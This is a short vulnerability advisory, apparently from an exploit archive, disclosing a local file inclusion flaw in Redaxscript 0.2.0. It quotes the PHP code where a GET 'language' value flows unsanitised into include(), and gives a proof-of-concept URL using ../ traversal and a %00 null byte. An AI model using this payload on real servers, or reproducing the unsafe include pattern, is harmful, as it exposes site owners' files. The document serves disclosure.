Redaxscript version 0.2.0 suffers from a local file inclusion vulnerability.
47d8f2b7b4ff4d2c57f88a8e09a42daf1365a46992d3aa47020a3f41973e759c
##################################################################################
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################
[+] Local File Inclusion
index.php :
-----------------------------------------------------------------
include('template/'.$_SESSION[_root.'template'].'/index.php');
-----------------------------------------------------------------
function.php :
-----------------------------------------------------------------
if($_GET['language']) {
$_SESSION[_root.'language'] = $_GET['language'];
-----------------------------------------------------------------
- PoC :
http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00
##################################################################################